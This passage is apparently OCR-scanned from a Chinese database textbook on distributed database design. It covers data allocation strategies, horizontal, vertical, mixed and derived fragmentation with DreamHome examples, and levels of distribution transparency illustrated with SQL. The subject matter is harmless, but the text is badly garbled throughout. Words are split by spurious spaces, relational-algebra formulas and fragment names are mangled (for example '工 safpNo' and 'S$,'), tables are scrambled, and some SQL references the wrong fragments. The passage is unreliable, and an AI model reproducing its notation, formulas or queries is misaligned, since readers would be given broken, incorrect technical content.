地 GSC 中 都 有 记录 。 在 24.5.1 节 中 介绍 命名 透明 性 时 再 来 讨论 对 象 命名 。 

分 布 式 DBMS 组 件 

分 布 式 DBMS 组 件 是 整个 系统 的 控制 单元 。 上 一 节 中 简要 地 列 出 了 该 组 件 的 功能 ， 在 

24.5 节 和 第 25 章 中 将 集中 讨论 这 些 功 能 。 


24.4 ”分 布 式 关 系数 据 库 设 计 


在 第 16 章 和 第 17 章 给 出 了 集中 式 关系 数据 库 的 概念 设计 和 逻辑 设计 的 方法 学 。 本 节 将 
研究 在 设计 分 布 式 关系 数据 库 时 需要 考虑 的 其 他 因素 。 具 体 来 说 将 研究 以 下 内 容 : 
e 分 段 。 关 系 可 以 分 若干 子 关系 〈 称 为 段 )， 然 后 分 布 到 各 个 结 点 。 分 段 有 两 种 主要 类 
型 : 水 平分 段 和 垂直 分 段 。 水 平分 段 是 元 组 的 子 集 ， 垂 直 分 段 是 属性 的 子 集 。 
e 分 配 。 将 每 个 分 段 都 “最 佳 ” 地 分 布 存储 到 结 点 中 。 
e 复制 。DDBMS 可 能 在 不 同 结 点 中 维护 一 个 分 段 的 多 个 副本 。 
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段 的 定义 以 及 分 配方 式 必须 基于 数据 库 如 何 使 用 。 这 主要 涉及 事务 的 分 析 。 通 常情 况 
下 ， 对 所 有 的 事务 都 进行 分 析 是 不 可 能 的 ， 所 以 只 集中 分 析 最 重要 的 一 些 事 务 。 正 如 在 18.2 
节 提 到 过 的 ， 用 户 最 常用 的 20% 的 查询 占据 了 数据 访问 总 量 的 80%。 这 个 80/20 规则 就 是 
进行 分 析 的 基本 方针 (Wiederhold，1983 ) 。 
设计 必须 同时 考虑 定量 和 定性 的 信息 。 定 量 信息 用 于 分 配 ， 定 性 信息 用 于 分 段 。 
定量 信息 包括 : 
e 事务 运行 的 频率 。 
e 运行 事务 的 结 点 。 
e 事务 性 能 指标 。 
定性 信息 可 能 包括 已 经 执行 的 事务 的 信息 ， 如 : 
e 访问 过 的 关系 、 属 性 和 元 组 。 
e 访问 的 类 型 ( 读 或 写 )。 
e 读 操作 的 谓词 。 
段 的 定义 与 分 配 主要 是 为 了 达到 以 下 目标 : 
e 引用 本 地 性 。 数 据 应 该 尽 可 能 地 存放 在 离 使 用 者 最 近 的 位 置 。 如 果 有 多 个 结 点 都 要 
使 用 同一 个 段 ， 在 这 些 结 点 上 各 保存 一 份 该 段 的 副本 将 更 加 有 利 。 

@ 改进 可 靠 性 和 可 用 性 。 通 过 复制 可 以 提高 可 靠 性 和 可 用 性 。 如 果 一 个 结 点 发 生 故 障 ， 
其 他 结 点 上 还 会 保存 着 该 结 点 分 段 的 副本 。 

@ 可 接受 的 性 能 。 不 好 的 分 配 会 引起 性 能 瓶颈 ， 即 一 个 结 点 可 能 被 其 他 结 点 的 请 求 阻 
塞 ， 可 能 会 导致 性 能 的 降低 。 另 外 ， 不 好 的 分 配 会 使 资源 得 不 到 充分 利用 。 

e 平衡 的 存储 容量 和 成 本 。 必 须 考虑 每 个 结 点 的 可 用 性 和 存储 成 本 ， 尽 量 使 用 廉价 的 

存储 器 。 但 必须 与 引用 本 地 性 进行 权衡 。 

e 最 小 化 通信 成 本 。 必 须 考虑 远程 访问 的 成 本 。 当 引用 本 地 性 最 大 时 或 当 每 个 结 点 都 

有 数据 副本 时 ， 检 索 的 成 本 最 小 。 但 是 ， 当 复制 的 数据 有 更 新 了 ， 每 一 个 拥有 该 数 
据 副 本 的 结 点 都 必须 进行 相应 的 更 新 ， 这 样 又 会 增 大 通信 的 成 本 。 


24.4.1 数据 分 配 


数据 分 配 有 四 种 可 选 策略 : 集中 、 分 段 、 完 全 复制 和 有 选择 复制 。 下 面 将 对 这 些 策略 进 
行 比较 。 
集中 策略 

这 种 策略 下 ， 只 有 唯一 一 个 数据 库 和 DBMS ， 并 且 存 储 在 同一 个 结 点 上 ， 而 用 户 分 布 于 
整个 网 络 之 上 (前 面 曾 把 这 种 策略 称 为 分 布 式 处 理 )。 

除了 中 心 结 点 以 外 ， 所 有 结 点 的 引用 本 地 性 都 降 到 了 最 低 ， 因 为 它们 必须 通过 网 络 来 完 
成 所 有 的 数据 访问 。 这 也 意味 着 很 高 的 通信 成 本 。 同 时 ， 可 靠 性 和 可 用 性 也 很 低 ， 因 为 中 心 
结 点 的 故障 可 能 会 使 整个 数据 库 系统 瘫痪 。 
分 段 策略 (或 者 称 为 划分 策略 ) 

这 种 策略 将 数据 库 划 分 为 不 相交 的 段 ， 每 个 段 分 配给 一 个 结 点 。 如 果 数 据 项 都 位 于 最 常 
被 使 用 的 结 点 ， 引 用 本 地 性 很 高 。 因 为 没有 复制 ， 所 以 存储 成 本 很 低 。 同 样 可 靠 性 和 可 用 性 
也 很 低 ， 可 能 比 集中 式 策略 略 好 一 点 ， 因 为 当 一 个 结 点 发 生 故 障 时 ， 只 会 丢失 故障 结 点 的 数 
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据 。 如 果 分 布设 计 得 好 ， 性 能 应 该 不 错 并 且 通 信 成 本 很 低 。 
完全 复制 策略 

这 种 策略 在 每 个 结 点 都 维护 一 个 数据 库 的 完整 副本 。 所 以 ， 引 用 本 地 性 、 可 靠 性 和 可 用 
性 以 及 性 能 都 达到 了 极致 。 然 而 ， 它 是 存储 成 本 和 通信 成 本 最 昂贵 的 一 种 策略 。 有 时 会 使 用 
快照 来 解决 这 些 问题 。 快 照 是 一 个 给 定时 间 的 数据 副本 。 定 时 更 新 副本 ， 比 如 ， 每 小 时 一 次 
或 每 周一 次 ， 而 不 是 实时 进行 更 新 。 有 时 也 用 快照 来 实现 分 布 式 数据 库 的 视图 ， 从 而 减少 在 
视图 上 完成 数据 库 操作 所 需 的 时 间 。26.3 节 将 讨论 快照 。 
有 选择 复制 策略 

这 种 策略 是 分 段 策略 、 复 制 策略 和 集中 策略 的 组 合 。 一 部 分 数据 项 被 分 段 以 获得 高 的 引 
用 本 地 性 ， 另 外 一 部 分 在 多 个 结 点 上 经 常 使 用 ， 就 采用 复制 策略 。 最 后 ， 还 有 一 部 分 数据 项 
采用 集中 策略 。 本 策略 的 目的 是 集 其 他 所 有 方法 的 优点 而 避免 其 他 方法 的 缺陷 。 由 于 有 具有 很 
强 的 适应 性 ， 这 种 策略 被 广泛 使 用 。 表 24-3 总 结 了 所 有 可 供 选 择 的 策略 。 感 兴趣 的 读者 如 
果 想 进一步 了 解 分 配 技 术 细 节 ， 可 以 参考 Ozsu and Valduriez ( 1999 ) 和 Teorey ( 1994 ) 。 


表 24-3 ”数据 分 配 策略 的 比较 


了 | 本 
i eR WR 





最 低 最 低 
高 ， 最 低 
最 高 
有 选择 复制 策略 虑 项 时 低 ， 考 虑 系统 时 高 


a: 依赖 于 好 的 设计 。 
24.4.2 分 段 


分 段 的 原因 
在 具体 讨论 分 段 之 前 ， 首 先 列 出 对 关系 进行 分 段 的 四 个 理由 : 
e 用 途 。 通 常 来 讲 ， 应 用 使 用 视图 而 不 使 用 整体 关系 。 所 以 ,分 布 数据 时 ， 似 乎 更 加 
适宜 使 用 关系 的 子 集 作为 一 个 分 布 的 单元 。 
e 效率 。 数 据 存储 在 最 常 被 使 用 的 位 置 。 另 外 ， 不 应 存储 本 地 应 用 不 使 用 的 数据 。 
e 并 行 性 。 使 用 段 作 为 分 布 单元 ， 事 务 的 操作 就 可 以 被 分 成 对 于 不 同 段 的 几 个 子 查询 
操作 。 这 将 会 提高 系统 的 并 发 性 ， 或 称 并 行 性 ， 从 而 允许 事务 安全 地 并 行 执行。 
e 安全 性 。 因 为 不 存储 与 本 地 应 用 无 关 的 数据 ， 所 以 这 些 数据 不 会 被 未 经 授权 的 用 户 
获得 。 
以 前 曾 提 及 过 ,分 段 有 两 个 主要 的 缺点 : 
e 性 能 。 需 要 从 多 个 结 点 上 获得 分 段 数据 的 全 局 应 用 性 能 可 能 会 下 降 。 
e 完整 性 。 如 果 数 据 和 函数 相关 性 被 分 段 并 且 分 配 到 多 个 不 同 结 点 上 ， 就 会 使 完整 性 
控制 更 加 困难 。 
分 段 的 正确 性 
分 段 不 能 随意 地 进行 ， 在 分 段 时 必须 遵守 以 下 三 条 规则 : 
(1 ) 完整 性 。 如 果 一 个 关系 实例 R 被 分 解 为 Ri, Ra,…, R,， 那 么 R 中 的 每 一 个 数据 项 必 
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须 至 少 在 其 中 一 个 分 段 中 出 现 。 这 条 规则 对 于 在 分 段 中 保护 数据 不 丢失 是 很 必要 的 。 

(2 ) 重组 。 必 须 定义 一 种 关系 操作 ， 可 以 将 分 段 重组 为 关系 RR。 这 条 规则 确保 功能 相关 
性 被 保留 。 

(3 ) 不 相交 。 如 果 数 据 项 4d; 出 现在 分 段 R; 中 ， 它 就 不 能 再 在 其 他 分 段 中 出 现 。 垂 直 分 
段 是 该 规则 的 一 个 例外 ， 它 的 主 关键 字 属 性 必须 重复 出 现 以 便于 重组 。 这 条 规则 确保 了 最 小 
的 数据 宛 余 性 。 

对 于 水 平分 段 ， 数 据 项 指 一 个 元 组 。 而 对 于 垂直 分 段 ， 数 据 项 则 指 一 个 属性 。 
分 段 的 类 型 

有 两 种 主要 的 分 段 类 型 : 水 平分 段 和 垂直 分 段 。 水 平分 段 是 元 组 的 子 集 ， 而 垂直 分 段 是 
属性 的 子 集 ， 如 图 24-8 所 示 。 男 外 ， 还 有 两 种 分 段 类 型 : 混合 分 段 (如 图 24-9 所 示 ) 和 导 
出 分 段 。 导 出 分 段 是 水 平分 段 的 一 种 类 型 。 下 面 使 用 图 4.3 所 示 的 DreamHome 数据 库 实例 
给 出 几 种 不 同 分 段 类 型 的 例子 。 
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图 24-8 两 种 主要 的 分 段 类 型 


a ) 包含 水 平分 段 的 垂直 分 段 b ) 包含 垂直 分 段 的 水 平分 段 
图 24-9 混合 分 段 


水 平分 段 
| 水 平分 段 | 由 关系 元 组 的 一 个 子 集 构成 。 


水 平分 段 将 重要 的 事务 共同 使 用 的 关系 元 组 集合 在 一 起 。 通 常 指定 一 个 谓词 来 产生 水 
平分 段 ， 该 谓词 给 出 关系 元 组 的 一 个 限制 。 一 般 使 用 关系 代数 中 的 选择 操作 来 定义 (参见 
5.1.1 节 )。 选 择 操作 找 出 具有 相同 性 质 的 一 组 元 组 ， 比 如 ， 被 同一 应 用 使 用 的 所 有 元 组 或 在 
同一 结 点 上 的 所 有 元 组 。 给 定 一 个 关系 R， 水 平分 段 定义 如 下 : 

op(R) 
其 中 p 是 基于 一 个 或 多 个 关系 属性 的 谓词 。 


| 例 24.2 》》 水 平分 段 
假设 只 有 两 种 房产 类 型 一 一 Flat 和 House， 那 么 基于 房产 类 型 对 PropertyForRent 进行 
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水 平分 段 如 下 : 

Pl: Otype= ‘House’ (PropertyForRent) 

Py: Otype= ‘Flat’ (PropertyForRent) 

这 里 产生 了 两 个 段 (PI 和 已 )， 一 个 由 type 属性 值 为 House 的 所 有 元 组 组 成 ， 另 一 个 由 
type 属性 值 为 Flat 的 所 有 元 组 组 成 ， 如 图 24-10 所 示 。 这 种 特殊 的 分 段 策 略 对 于 分 别处 理 
House 和 Flat 的 应 用 比较 有 利 。 该 分 段 方案 满足 正确 性 规则 : 

@ 完整 性 。 每 个 元 组 只 在 已 中 出 现 或 只 在 P; 中 出 现 。 

e@ 重组 。 关 系 PropertyForRent 可 以 由 所 有 段 使 用 “并 ”操作 来 重组 : 

PiUP,=PropertyForRent 
@ 不 相交 。 这 些 分 段 是 不 相交 的 ， 因 为 没有 一 种 房产 类 型 既是 House 又 是 Flat。 


分 段 P 

propero |eboot Joy |posteode | ype | rooms [ront | omene| sme| eanoh 
PA14 16 Holhead | Aberdeen | AB7 5SU 6 650 | CO46 SA9 B007 
PG21 18 Dale Rd | Glasgow | G12 5 600 | CO87 SG37 B003 


reportio [eoet [ety [postcode | vo [roome [cont | ewer | ae| emehh 
B00 


PL94 6 Argyll St London | NW2 Flat |4 400 | CO87 SLAL 5 
PG4 6 Lawrence St | Glasgow | Gi1 9QX |Flat |3 350 | CO40 SG14 B003 
2ManorRd | Glasgow |G324QX |Flat |3 375 | CO93 SG37 B003 
5NovarDr |Glasgow|G129AX |Flat |4 450 | CO93 SG14 B003 


图 24-10 ”基于 房产 类 型 对 PropertyForRent 进行 水 平分 段 《人 


有 时 ， 水 平分 段 策略 的 选择 是 很 显而易见 的 。 但 是 ， 在 有 些 情况 下 ， 就 有 必要 仔细 分 析 
应 用 。 分 析 包 括 对 应 用 中 事务 和 查询 所 使 用 的 谓词 (或 搜索 条 件 ) 的 考察 。 谓 词 可 能 是 简单 
的 ， 涉 及 单个 属性 ; 也 可 能 是 复杂 的 ， 涉 及 多 个 属性 。 每 个 属性 的 谓词 可 以 是 单 值 的 也 可 以 
是 多 值 的 。 在 下 面 的 例子 中 ， 值 可 以 是 离散 的 也 可 以 是 一 个 值 范围 。 

分 段 策略 就 是 要 找到 的 一 个 最 小 (完整 且 相 关 的 ) 谓词 集 (Ceri 等 人 ，1982 )， 它 将 
作为 分 段 方案 基础 。 称 一 个 谓词 集 是 完整 的 当 且 仅 当 任 一 事务 访问 同一 分 段 内 的 任意 两 个 
元 组 概率 都 相同 。 称 谓词 集 是 相关 的 仅 当 至 少 存 在 一 个 事务 用 不 同 的 方式 访问 这 些 段 。 例 
如 ， 假 设 唯一 的 查询 需求 就 是 基于 房产 类 型 从 PropertyForRent 中 选择 元 组 ， 那 么 集合 
{type=“House ', type=“Flat”} 是 完整 的 ， 而 {type=“House ”} 是 不 完整 的 。 另 一 方面 ， 
对 于 同样 的 需求 ， 谓 词 (city=“Aberdeen ' ) 是 不 相关 的 。 
垂直 分 段 


| 垂直 分 段 | 由 关系 属性 的 一 个 子 集 构成 。 


垂直 分 段 将 重要 事务 同时 使 用 的 若干 个 关系 属性 分 成 组 。 垂 直 分 段 是 使 用 关系 代数 中 的 
投影 操作 来 定义 的 (参见 5.1.1 节 )。 给 定 一 个 关系 尽 ， 垂 直 分 段 定义 如 下 : 












[a a 
其 中 dl, ***, Un 是 关系 R 的 属性 。 
| 24.3 3》》 垂直 分 段 


DreamHome 的 发 工资 应 用 需要 每 个 员工 的 staffNo 和 position、sex、DOB ,salary 等 属性 ， 
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而 人 事 部 门 需 要 staffNo、fName、1IName 和 branchNo 等 属性 ， 那 么 可 对 Sta 任 垂直 分 段 如 下 : 

S1: 工 safpNo, position, sex, DOB, salary(Staff) 

S2: 工 sarmNo, fName, IName, branchNo( Staff) 

其 中 产生 了 两 个 段 (S1 和 5S,)， 如 图 24-11 所 示 。 注 意 每 个 段 里 都 包含 主 关键 字 
staffNo， 使 得 原 关 系 可 以 被 重组 出 来 。 垂 直 分 段 的 优点 在 于 段 可 以 只 存储 在 需要 它们 的 那 
些 结 点 上 上。 另外， 因为 段 比 原 关 系 体积 小 ， 所 以 性 能 会 有 所 提高 。 该 分 段 方案 满足 正确 性 
规则 : 

e 完整 性 。 每 个 Sta 任 关系 的 属性 只 出 现在 Si 中 或 只 出 现在 S, 中 。 

e 重组 。Sta 人 ff 关系 可 以 通过 所 有 段 的 自然 连接 重组 : 


Sir4S,= Staff 
@ 不 相交 。 除 主 关键 字 外 ， 所 有 段 都 不 相交 ， 主 关键 字 的 元 余 对 于 重组 是 必要 的 。 
分 段 S; 分 段 Sz 





13-Jun-65 9000 
图 24-11 Staff 的 垂直 分 段 人 


垂直 分 段 是 由 一 个 属性 与 其 他 属性 间 的 亲 和 度 (affinity) 决定 的 。 确 定 亲 和 度 的 一 种 
做 法 是 建立 矩阵 显示 涉及 每 对 属性 的 访问 次 数 。 例 如 ， 一 个 事务 访问 关系 R(a1, az, aa, as) 的 
a、a 和 a4 属性， 那么 用 矩阵 表示 如 下 : 








矩阵 是 三 角形 ， 对 角 线 以 下 的 部 分 不 用 填写 ， 因 为 它 是 右上 三 角 的 镜像 。 和 矩阵 中 的 元 素 
1 代表 访问 涉及 相应 的 属性 对 ， 它 最 后 将 变 为 代表 事务 频率 的 数字 。 每 个 事务 都 会 产生 一 个 
矩阵， 并 且 还 会 产生 一 个 总 的 矩阵 来 显示 每 对 属性 的 总 访问 次 数 。 具 有 高 亲 和 度 的 属性 对 显 
然 应 当 出 现在 同一 个 垂直 分 段 中 ， 低 亲 和 度 的 属性 对 就 有 可 能 被 分 开 。 显 然 ， 考 虑 一 个 个 属 
性 以 及 所 有 主要 的 事务 是 一 个 非常 元 长 的 计算 过 程 。 因 此 ， 如 果 已 知 某 些 属性 是 相关 的 ， 最 
好 成 组 处 理 这 些 属性 。 

这 种 方法 就 称 为 拆 分 ， 是 由 Navathe 等 人 (1984 ) 首先 提出 来 的 。 它 能 产生 一 个 不 重 秋 
的 分 段 集合 ， 而 且 符 合 前 面 定 义 的 不 相交 原则 。 实 际 上 ， 不 重合 的 特性 只 适用 于 非 主 关键 字 
的 属性 。 主 关键 字 会 出 现在 每 个 分 段 中 ， 所 以 可 以 在 分 析 中 上 略 去 。 如 果 想 进一步 了 解 这 种 方 
法 ， 可 以 参考 Ozsu and Valduriez ( 1999 ) 。 

混合 分 段 ” 对 于 某 些 应 用 ， 对 数据 库 模 式 单 纯 使 用 水 平分 段 和 垂直 分 段 不 能 满足 数据 分 
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布 的 需要 ， 所 以 需要 使 用 混合 分 段 。 
| 混合 分 段 | 由 包含 垂直 分 段 的 水 平分 段 构 成 ， 或 由 包含 水 平分 段 的 垂直 分 段 构成 。 


混合 分 段 是 使 用 关系 代数 中 的 选择 和 投影 操作 来 定义 的 。 给 定 一 个 关系 R， 混 合 分 段 定 
义 如 下 : 
Op( Ta ,-.., a,(R)) 
或 
Ho.. ,an(Op(R)) 
其 中 p 是 基于 RR 的 一 个 或 多 个 属性 的 谓词 ，a1,…, a 是 R 的 属性 。 


| 例 24.4 3 混合 分 段 

在 例 24.3 中 ， 分 别针 对 发 工资 应 用 和 人 事 部 门 对 Sta 任 进行 了 垂直 分 段 : 

S1: 工 I wafrNo, position, sex, DOB, salary(Staff) 

S2: TI safryo, {Name, IName, branchNo( Staff) 

现在 可 以 依据 分 公司 编号 再 对 品 分 段 进 行 水 平分 段 (为 简单 起 见 ， 假 设 只 有 3 个 分 公司 ): 

S21: ObranchNo=*B003' (92) 

S22: OpranchNo=* B005' ($2) 

S23: ObranchNo=*B007’ (S27) 

这 里 产生 了 三 个 分 段 (5s1、S2s 和 Sy3)， 其 中 一 个 是 包含 分 公司 编号 为 B003 的 所 有 元 
组 (Sy1)， 一 个 是 包含 分 公司 编号 为 B005 的 所 有 元 组 (Ss)， 还 有 一 个 是 包含 分 公司 编号 为 
B007 的 所 有 元 组 (S23 )， 如 图 24-12 所 示 。 该 分 段 方 案 满足 正确 性 规则 : 

@ 完整 性 。 每 个 Staff 关 系 的 属性 只 出 现在 5 或 5S; 中， 每 个 (或 部 分 ) 元 组 都 在 Si 以 
及 Sn、S22、Ss 中 的 某 一 个 中 出 现 。 
重组 。Staff 关系 可 以 对 所 有 的 分 段 使 用 “并 ”操作 和 自然 连接 操作 来 重组 : 

Si pa (S21 U S22U S73)= Staff 

不 相交 。 分 段 是 不 相交 的 ， 因 为 没有 员工 可 以 在 多 个 分 公司 任职 。 除 主 关键 字 外 ， 
Si 和 也 是 不 相交 的 。 












| 
月 


mr pe 本 要 和 下 要 
Ann B003 
David B003 

SG5 Susan B003 





staffNo | fName | Na me ep 
SL21 John |White | B005 
Sal yahe Lee B005 


图 24-12 ”Staff 的 混合 分 段 《《 
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导出 水 平分 段 有 些 应 用 可 能 包含 两 个 或 多 个 关系 的 连接 。 如 果 这 些 关 系 存放 在 不 同位 
置 ， 处 理 连接 的 开销 就 会 很 大 。 这 样 ， 或 许 将 这 些 关系 或 关系 的 分 段 放 在 一 起 会 更 适合 。i 
可 以 通过 导出 水 平分 段 实 现 。 


| 导出 分 段 | 基于 父 关系 水 平分 段 的 水 平分 段 。 


把 包含 外 部 关键 字 的 关系 称 为 子 关系 ， 而 把 包含 对 应 主 关键 字 的 关系 称 为 父 关 系 。 导 出 
分 段 是 使 用 关系 代数 中 的 半 连 接 操 作 来 定义 的 。 给 定 一 个 子 关系 R 和 一 个 父 关系 S， 关 系 R 
的 导出 分 段 定义 如 下 : 

R=RDS, 1<i<w 

其 中 w 是 关系 5S 上 定义 的 水 平分 段 数 ,，f 是 连接 属性 。 


| 例 24.5 从 导出 水 平分 段 

可 能 存在 一 个 应 用 需要 将 关系 Staff 和 关系 PropertyForRent 连接 起 来 。 例 如 ， 假 定 关系 
Staff 已 根据 分 公司 编号 水 平分 段 ， 因 此 与 分 公司 相关 的 数据 在 本 地 存储 : 

$3: ObranchNo=*B003' (Staff) 

S4: OpranchNo= "B005' (Staff) 

Ss: ObranchNo=* B007' (Staff) 

同时 假设 房产 PG4 当前 是 由 SG14 管理 的 。 使 用 相同 的 分 段 策略 来 存储 房产 数据 显然 
是 有 用 的 。 这 可 通过 使 用 导出 分 段 使 关系 PropertyForRent 也 根据 分 公司 编号 进行 水 平分 段 ， 
如 下 所 示 : 

P;=PropertyForRent ba sato S$ 3i<5 

这 里 产生 了 三 个 分 段 (P;、Ps 和 Ps)， 其 中 一 个 包含 由 编号 为 B003 的 分 公司 中 的 员工 
管理 的 房产 ( P;)， 一 个 包含 由 编号 为 B005 的 分 公司 中 的 员工 管理 的 房产 ( P4)， 还 有 一 个 
包含 由 编号 为 B007 的 分 公司 中 的 员工 管理 的 房产 (Ps)， 如 图 24-13 所 示 。 显 然 ， 很 容易 证 
明 该 分 段 方案 也 是 满足 正确 性 规则 的 。 这 留 给 读者 作为 练习 。 





分 段 Pe 





cr 


图 24-13 ”基于 Staff 的 PropertyForRent 的 导出 分 段 
如 果 一 个 关系 包含 多 个 外 部 关键 字 ， 就 必须 选择 其 中 一 个 被 引用 关系 作为 其 父 关 系 。 这 
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个 选择 可 以 基于 最 常 使 用 的 分 段 或 者 基于 连接 特性 更 好 的 分 段 ， 也 就 是 说 ， 考 虑 连接 是 否 涉 
及 更 小 的 分 段 或 者 连接 是 否 能 更 高 程度 地 并 行 执行 等 。 « 
不 分 段 

最 后 一 种 策略 是 不 分 段 。 例 如 ， 关 系 Branch 只 包含 少量 的 元 组 并 且 不 经 常 更 新 ， 与 其 
将 它 水 平分 段 ， 比 如 按 分 公司 编号 分 段 ， 还 不 如 保留 完整 的 Branch 关系 并 直接 将 其 复制 到 
每 个 结 点 显得 更 加 明智 。 
分 布 式 数 据 库 设 计 方 法 学 总 结 

下 面 对 分 布 式 数据 库 设 计 方 法 学 进行 总 结 。 

(1) 使 用 第 16、17 章 介绍 的 方法 学 为 全 局 关系 产生 一 个 设计 方案 。 

(2 ) 考察 系统 的 拓扑 结构 。 例 如 ， 考 虑 DreamHome 是 在 每 个 分 公司 都 设 一 个 数据 库 ， 
还 是 在 每 个 城市 设 一 个 ， 还 是 仅仅 在 地 区 级 设 数据 库 。 第 一 种 情况 下 ， 对 关系 的 分 段 最 好 基 
于 分 公司 编号 ， 而 在 后 两 种 情况 下 ， 更 适宜 根据 城市 或 地 区 对 关系 进行 分 段 。 

(3 ) 分 析 系 统 中 最 重要 的 事务 ， 并 决定 在 哪里 进行 水 平分 段 或 垂直 分 段 。 

(4) 确定 哪些 关系 不 用 分 段 ， 直 接 将 这 些 关 系 复制 到 每 个 结 点 。 从 全 局 ER 图 上 删 去 不 
用 分 段 的 关系 以 及 这 些 事务 涉及 的 任何 联系 。 

(5 ) 考察 一 对 多 联系 中 代表 一 方 实体 的 关系 ,并 考虑 系统 的 拓扑 结构 ， 对 这 些 关 系 给 出 
一 个 适合 的 分 段 方案 。 而 对 于 代表 多 方 实体 的 关系 可 能 更 适合 于 导出 分 段 。 

(6 ) 在 上 一 步 中 ， 考 察 哪 些 情况 下 适宜 使 用 垂直 分 段 或 混合 分 段 ( 即 考虑 那些 需要 访问 
关系 属性 子 集 的 事务 的 情况 )。 


24.5 ”DDBMS 的 透明 性 


在 24.1.1 节 中 给 出 的 DDBMS 定义 说 明了 系统 必须 使 分 布 对 用 户 透明 。 透 明 性 对 用 户 
隐藏 了 实现 细节 。 例 如 ， 集 中 式 DBMS 中 ， 数 据 独立 性 就 是 一 种 透明 性 ， 它 对 用 户 隐藏 了 
定义 的 变化 和 数据 的 组 织 形 式 。DDBMS 能 提供 多 级 透明 性 。 当 然 ， 这 些 都 是 为 了 实现 一 个 
总 的 目标 : 让 用 户 在 使 用 分 布 式 数据 库 时 就 像 在 使 用 集中 式 数据 库 一 样 。 可 以 确定 DDBMS 
的 四 种 主要 透明 性 类 型 ; 

e 分 布 透 明 性 。 

e 事务 透明 性 。 

e 性 能 透明 性 。 

e DBMS 透明 性 。 

在 讨论 各 种 透明 性 类 型 之 前 ， 应 当 注 意 到 完全 透明 并 不 是 普遍 被 接受 的 目标 。 例 如 ， 
Gray( 1989 ) 认为 完全 透明 使 分 布 式 数 据 的 管理 非常 困难 ， 对 地 理 上 分 布 的 数据 库 ， 采 用 透 
明 的 访问 方式 编写 的 应 用 可 管理 性 差 、 模 块 化 程度 低 、 消 息 性 能 差 。 注 意 ， 我 们 讨论 的 透明 
性 并 不 一 定 是 每 个 系统 都 能 满足 的 。 


24.5.1 分 布 透明 性 


分 布 透明 性 使 用 户 感觉 到 数据 库 是 一 个 单独 的 逻辑 整体 。 如 果 DDBMS 提供 了 分 布 透明 
性 ， 用 户 就 不 需要 知道 数据 如 何 分 段 (分 段 透明 性 ) 以 及 数据 项 的 位 置 所 在 (位置 透明 性 )。 
如 果 用 户 必 须知 道 数据 分 段 以 及 数据 项 位 置 等 信息 ， 就 把 这 种 情况 称 为 本 地 映射 透明 
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性 。 现 在 依次 讨论 这 些 透明 性 。 为 了 说 明 概 念 ， 使 用 例 24.4 给 出 的 Staff 关系 的 分 布 : 


S1: JILsanNo poiition; sex, DOB, salary(Staff) 位 于 结 点 5 

S2: 工 safmNvo, Name, IName, branchNo( Staff) 

S21: ObranchNo= ‘B003" ($2) 位 于 结 点 3 

S22: ObranchNo= “B005’ (92) 位 于 结 点 5 

S23: ObranchNo= “B007" (S2) 位 于 结 点 7 
分 段 透明 性 


分 段 透明 性 是 分 布 透明 性 的 最 高 级 别 。 如 果 DDBMS 提供 分 段 透明 性 ， 用 户 就 不 需要 知 
道 数 据 是 否 分 段 ， 因 此 ， 数 据 访问 都 是 基于 全 局 方案 ， 用 户 不 需要 指定 段 名 或 数据 位 置 。 例 
如 ， 要 检索 所 有 经 理 的 姓名 ， 有 了 分 段 透明 性 ， 就 可 以 这 样 写 : 

SELECT fName, IName 

FROM Staff 

WHERE position = Manager; 

这 与 集中 式 系统 所 用 的 SQL 语句 完全 相同 。 
位 置 透明 性 


位 置 透明 性 是 分 布 透明 性 的 中 间 级 别 。 此 时 ,用 户 需 要 知道 数据 如 何 分 段 ， 但 不 需要 知 
道 数 据 的 具体 位 置 。 在 位 置 透明 条 件 下 ， 以 上 的 查询 变 为 : 


SELECT fName, IName 

FROM S$, 

WHERE staffNo IN (SELECT staffNo FROM S WHERE position = Manager ) 
UNION 

SELECT fName, IName 

FROM S,, 

WHERE staffNo IN (SELECT staffNo FROM S, WHERE position = Manager ) 
UNION 

SELECT fName, IName 

FROM S,, 

WHERE staffNo IN (SELECT staffNo FROM S WHERE position = Manager ); 


现在 就 必须 在 查询 中 指明 段 名 。 同 时 ， 因 为 属性 position 和 fName/IName 出 现在 不 同 的 
垂直 分 段 中 ， 所 以 必须 使 用 连接 (或 子 查询 )。 位 置 透 明 性 的 最 主要 优势 在 于 可 以 在 物理 上 
重 构 数 据 库 而 不 会 对 访问 它 的 应 用 造成 影响 。 
复制 透明 性 

复制 透明 性 和 位 置 透明 性 紧密 相关 ， 即 用 户 察觉 不 到 分 段 的 复制 。 位 置 透 明 性 暗含 复制 
透明 性 。 然 而 ， 一 个 系统 可 能 没有 位 置 透 明 性 却 有 复制 透明 性 。 

本 地 映射 透明 性 

本 地 映射 透明 性 是 分 布 透明 性 的 最 低级 别 。 在 本 地 映射 透明 性 下 ， 考 虑 到 可 能 存在 数 
据 复制 ， 用 户 既 要 指定 段 名 又 要 指定 数据 项 的 位 置 。 在 本 地 映射 透明 性 下 ， 以 上 的 查询 就 
变 为 : 

SELECT fName, IName 

FROM S: AT SITE 3 


WHERE staffNo IN (SELECT staffNo FROM S, AT SITE 5 WHERE 
position = "Manager) UNION 
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SELECT fName, IName 

FROM S,, AT SITE 5 

WHERE staffNo IN (SELECT staffNo FROM S, AT SITE 5 WHERE 

position = Manager) UNION 

SELECT fName, IName 

FROM S,, AT SITE 7 

WHERE staffNo IN (SELECT staffNo FROM S, AT SITE 5 WHERE 

position ="Manager’); 

为 了 说 明 的 需要 ， 在 SQL 语句 中 扩展 了 一 个 关键 字 AT SITE， 用 来 表达 一 个 特定 段 的 
位 置 所 在 。 显 然 ， 和 前 两 个 例子 相 比 ， 这 样 更 复杂 ， 输 入 查询 条 件 更 耗 时 。 如 果 系 统 仅仅 提 
供 这 一 级 透明 性 ， 似 乎 不 太 可 能 被 终端 用 户 所 接受 。 
命名 透明 性 

作为 以 上 所 有 分 布 透明 性 的 必然 结果 ， 可 以 得 到 命名 透明 性 。 和 集中 式 数据 库 一 样 ， 分 
布 式 数据 库 中 每 个 数据 项 都 只 能 有 唯一 一 个 名 字 。 所 以 ，DDBMS 必须 保证 任意 两 个 结 点 都 
不 会 创建 同名 的 数据 库 对 象 。 一 种 解决 办 法 是 创建 集中 的 名 字 服 务 器 ， 负 责 保 证 系统 中 所 有 
名 字 的 唯一 性 。 然 而 ， 这 种 方法 会 导致 : 

e 丧失 一 些 本 地 自治 性 。 

e 如 果 这 个 中 心 结 点 成 为 瓶颈 ， 系 统 性 能 就 会 出 现 问题 。 

e 低 可 用 性 。 如 果 这 个 中 心 结 点 发 生 故 障 ， 其 他 结 点 就 不 能 再 创建 新 的 数据 库 对 象 。 

